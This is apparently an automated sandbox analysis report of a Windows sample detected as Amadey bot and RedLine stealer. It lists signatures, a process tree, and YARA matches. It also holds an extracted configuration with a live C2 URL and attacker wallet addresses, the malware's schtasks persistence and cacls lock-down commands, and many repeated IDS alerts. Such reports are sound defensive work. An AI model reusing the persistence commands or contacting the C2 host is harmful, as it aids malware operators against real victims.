Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:799672
MD5:3ac20281c213c418608fcea6d744ae8f
SHA1:694ee56f317c410cce4bb0dec9b1d6b6f4059f48
SHA256:f33d6a14fc683aa41846e4073347b71810d835e5f7695dd834b98007826ec831
Tags:exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Amadeys Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 1880 cmdline: C:\Users\user\Desktop\file.exe MD5: 3AC20281C213C418608FCEA6D744AE8F)
    • brJg.exe (PID: 2296 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\brJg.exe MD5: E61222B4D82A6007A553851456BCC651)
      • arJf.exe (PID: 6080 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\arJf.exe MD5: 01BC3DF99AB67BABCDC1577241E3EE87)
      • nika.exe (PID: 6128 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 3184 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 2728 cmdline: "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 5816 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 3824 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 604 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 2664 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 2880 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 4884 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 5064 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 1124 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 2192 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 3484 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 1428 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 3008 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 5360 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 4800 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 4552 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            SourceRuleDescriptionAuthorStrings
            0000001C.00000002.412655905.0000000000071000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000001A.00000000.401919368.0000000000071000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                  • 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                  • 0x1fdd0:$s5: delete[]
                  • 0x1f288:$s6: constructor or from DllMain.
                  00000021.00000002.667787109.0000000000071000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    Click to see the 18 entries
                    SourceRuleDescriptionAuthorStrings
                    28.2.mnolyk.exe.70000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      26.2.mnolyk.exe.70000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        31.0.mnolyk.exe.70000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          28.0.mnolyk.exe.70000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            0.3.file.exe.4a09a20.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              Click to see the 18 entries
                              No Sigma rule has matched
                              Timestamp:192.168.2.762.204.41.449808802027700 02/06/23-18:36:19.520673
                              SID:2027700
                              Source Port:49808
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449869802027700 02/06/23-18:36:34.178044
                              SID:2027700
                              Source Port:49869
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450136802027700 02/06/23-18:37:49.465984
                              SID:2027700
                              Source Port:50136
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450329802027700 02/06/23-18:38:39.784785
                              SID:2027700
                              Source Port:50329
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449906802027700 02/06/23-18:36:47.288237
                              SID:2027700
                              Source Port:49906
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450295802027700 02/06/23-18:38:31.730774
                              SID:2027700
                              Source Port:50295
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450041802027700 02/06/23-18:37:24.611334
                              SID:2027700
                              Source Port:50041
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450099802027700 02/06/23-18:37:39.765161
                              SID:2027700
                              Source Port:50099
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450197802027700 02/06/23-18:38:04.844993
                              SID:2027700
                              Source Port:50197
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450332802027700 02/06/23-18:38:40.516329
                              SID:2027700
                              Source Port:50332
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449774802027700 02/06/23-18:36:09.754520
                              SID:2027700
                              Source Port:49774
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449872802027700 02/06/23-18:36:35.424116
                              SID:2027700
                              Source Port:49872
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450038802027700 02/06/23-18:37:23.886376
                              SID:2027700
                              Source Port:50038
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450234802027700 02/06/23-18:38:15.320717
                              SID:2027700
                              Source Port:50234
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449811802027700 02/06/23-18:36:20.234434
                              SID:2027700
                              Source Port:49811
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449967802027700 02/06/23-18:37:04.009354
                              SID:2027700
                              Source Port:49967
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449746802027700 02/06/23-18:36:02.941804
                              SID:2027700
                              Source Port:49746
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450074802027700 02/06/23-18:37:33.782821
                              SID:2027700
                              Source Port:50074
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450172802027700 02/06/23-18:37:58.795470
                              SID:2027700
                              Source Port:50172
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450270802027700 02/06/23-18:38:23.999396
                              SID:2027700
                              Source Port:50270
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449844802027700 02/06/23-18:36:28.246222
                              SID:2027700
                              Source Port:49844
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450304802027700 02/06/23-18:38:33.925233
                              SID:2027700
                              Source Port:50304
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449939802027700 02/06/23-18:36:57.241621
                              SID:2027700
                              Source Port:49939
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450066802027700 02/06/23-18:37:30.995908
                              SID:2027700
                              Source Port:50066
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450267802027700 02/06/23-18:38:23.274292
                              SID:2027700
                              Source Port:50267
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450013802027700 02/06/23-18:37:17.791988
                              SID:2027700
                              Source Port:50013
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449897802027700 02/06/23-18:36:42.089661
                              SID:2027700
                              Source Port:49897
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449816802027700 02/06/23-18:36:21.444072
                              SID:2027700
                              Source Port:49816
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450144802027700 02/06/23-18:37:52.098502
                              SID:2027700
                              Source Port:50144
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450239802027700 02/06/23-18:38:16.554901
                              SID:2027700
                              Source Port:50239
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449779802027700 02/06/23-18:36:10.997636
                              SID:2027700
                              Source Port:49779
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449975802027700 02/06/23-18:37:05.978493
                              SID:2027700
                              Source Port:49975
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449934802027700 02/06/23-18:36:56.059242
                              SID:2027700
                              Source Port:49934
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450262802027700 02/06/23-18:38:22.083151
                              SID:2027700
                              Source Port:50262
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450108802027700 02/06/23-18:37:41.895553
                              SID:2027700
                              Source Port:50108
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449738802027700 02/06/23-18:36:01.020544
                              SID:2027700
                              Source Port:49738
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449970802027700 02/06/23-18:37:04.713405
                              SID:2027700
                              Source Port:49970
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450357802027700 02/06/23-18:38:48.553891
                              SID:2027700
                              Source Port:50357
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450340802027700 02/06/23-18:38:42.464572
                              SID:2027700
                              Source Port:50340
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450103802027700 02/06/23-18:37:40.718413
                              SID:2027700
                              Source Port:50103
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449990802027700 02/06/23-18:37:09.711792
                              SID:2027700
                              Source Port:49990
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449892802027700 02/06/23-18:36:40.888979
                              SID:2027700
                              Source Port:49892
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450352802027700 02/06/23-18:38:47.330598
                              SID:2027700
                              Source Port:50352
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449733802027700 02/06/23-18:35:59.781456
                              SID:2027700
                              Source Port:49733
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450000802027700 02/06/23-18:37:14.484343
                              SID:2027700
                              Source Port:50000
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450079802027700 02/06/23-18:37:34.965164
                              SID:2027700
                              Source Port:50079
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450082802027700 02/06/23-18:37:35.692289
                              SID:2027700
                              Source Port:50082
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450309802027700 02/06/23-18:38:35.147885
                              SID:2027700
                              Source Port:50309
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450254802027700 02/06/23-18:38:20.179240
                              SID:2027700
                              Source Port:50254
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449782802027700 02/06/23-18:36:11.473355
                              SID:2027700
                              Source Port:49782
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449852802027700 02/06/23-18:36:29.914060
                              SID:2027700
                              Source Port:49852
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450180802027700 02/06/23-18:38:00.687932
                              SID:2027700
                              Source Port:50180
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449754802027700 02/06/23-18:36:04.905748
                              SID:2027700
                              Source Port:49754
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449926802027700 02/06/23-18:36:52.489079
                              SID:2027700
                              Source Port:49926
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450287802027700 02/06/23-18:38:29.798910
                              SID:2027700
                              Source Port:50287
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449959802027700 02/06/23-18:37:02.027473
                              SID:2027700
                              Source Port:49959
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450226802027700 02/06/23-18:38:13.375752
                              SID:2027700
                              Source Port:50226
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450324802027700 02/06/23-18:38:38.548279
                              SID:2027700
                              Source Port:50324
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450290802027700 02/06/23-18:38:30.501538
                              SID:2027700
                              Source Port:50290
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450116802027700 02/06/23-18:37:43.857816
                              SID:2027700
                              Source Port:50116
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449962802027700 02/06/23-18:37:02.769565
                              SID:2027700
                              Source Port:49962
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450018802027700 02/06/23-18:37:19.057349
                              SID:2027700
                              Source Port:50018
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450033802027700 02/06/23-18:37:22.700596
                              SID:2027700
                              Source Port:50033
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450189802027700 02/06/23-18:38:02.860152
                              SID:2027700
                              Source Port:50189
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449787802027700 02/06/23-18:36:12.665967
                              SID:2027700
                              Source Port:49787
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450218802027700 02/06/23-18:38:11.455700
                              SID:2027700
                              Source Port:50218
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450152802027700 02/06/23-18:37:54.029428
                              SID:2027700
                              Source Port:50152
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450365802027700 02/06/23-18:38:50.493705
                              SID:2027700
                              Source Port:50365
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450282802027700 02/06/23-18:38:28.628161
                              SID:2027700
                              Source Port:50282
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449995802027700 02/06/23-18:37:11.226045
                              SID:2027700
                              Source Port:49995
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450111802027700 02/06/23-18:37:42.623221
                              SID:2027700
                              Source Port:50111
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449824802027700 02/06/23-18:36:23.412568
                              SID:2027700
                              Source Port:49824
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449741802027700 02/06/23-18:36:01.744620
                              SID:2027700
                              Source Port:49741
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449954802027700 02/06/23-18:37:00.821017
                              SID:2027700
                              Source Port:49954
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450337802027700 02/06/23-18:38:41.721828
                              SID:2027700
                              Source Port:50337
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450046802027700 02/06/23-18:37:25.862441
                              SID:2027700
                              Source Port:50046
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449759802027700 02/06/23-18:36:06.092268
                              SID:2027700
                              Source Port:49759
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450360802027700 02/06/23-18:38:49.288881
                              SID:2027700
                              Source Port:50360
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449889802027700 02/06/23-18:36:40.164302
                              SID:2027700
                              Source Port:49889
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450005802027700 02/06/23-18:37:15.731218
                              SID:2027700
                              Source Port:50005
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450259802027700 02/06/23-18:38:21.378414
                              SID:2027700
                              Source Port:50259
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450087802027700 02/06/23-18:37:36.937901
                              SID:2027700
                              Source Port:50087
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450124802027700 02/06/23-18:37:45.767098
                              SID:2027700
                              Source Port:50124
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450026802027700 02/06/23-18:37:21.007243
                              SID:2027700
                              Source Port:50026
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449982802027700 02/06/23-18:37:07.790106
                              SID:2027700
                              Source Port:49982
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449988802027700 02/06/23-18:37:09.232773
                              SID:2027700
                              Source Port:49988
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450255802027700 02/06/23-18:38:20.425505
                              SID:2027700
                              Source Port:50255
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449921802027700 02/06/23-18:36:50.850422
                              SID:2027700
                              Source Port:49921
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449734802027700 02/06/23-18:36:00.024734
                              SID:2027700
                              Source Port:49734
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450001802027700 02/06/23-18:37:14.735617
                              SID:2027700
                              Source Port:50001
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450157802027700 02/06/23-18:37:55.206071
                              SID:2027700
                              Source Port:50157
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450353802027700 02/06/23-18:38:47.570344
                              SID:2027700
                              Source Port:50353
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449725802027700 02/06/23-18:35:56.007022
                              SID:2027700
                              Source Port:49725
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449823802027700 02/06/23-18:36:23.177069
                              SID:2027700
                              Source Port:49823
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449979802027700 02/06/23-18:37:06.951379
                              SID:2027700
                              Source Port:49979
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449790802027700 02/06/23-18:36:13.365591
                              SID:2027700
                              Source Port:49790
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449832802027700 02/06/23-18:36:25.351769
                              SID:2027700
                              Source Port:49832
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450344802027700 02/06/23-18:38:44.257733
                              SID:2027700
                              Source Port:50344
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
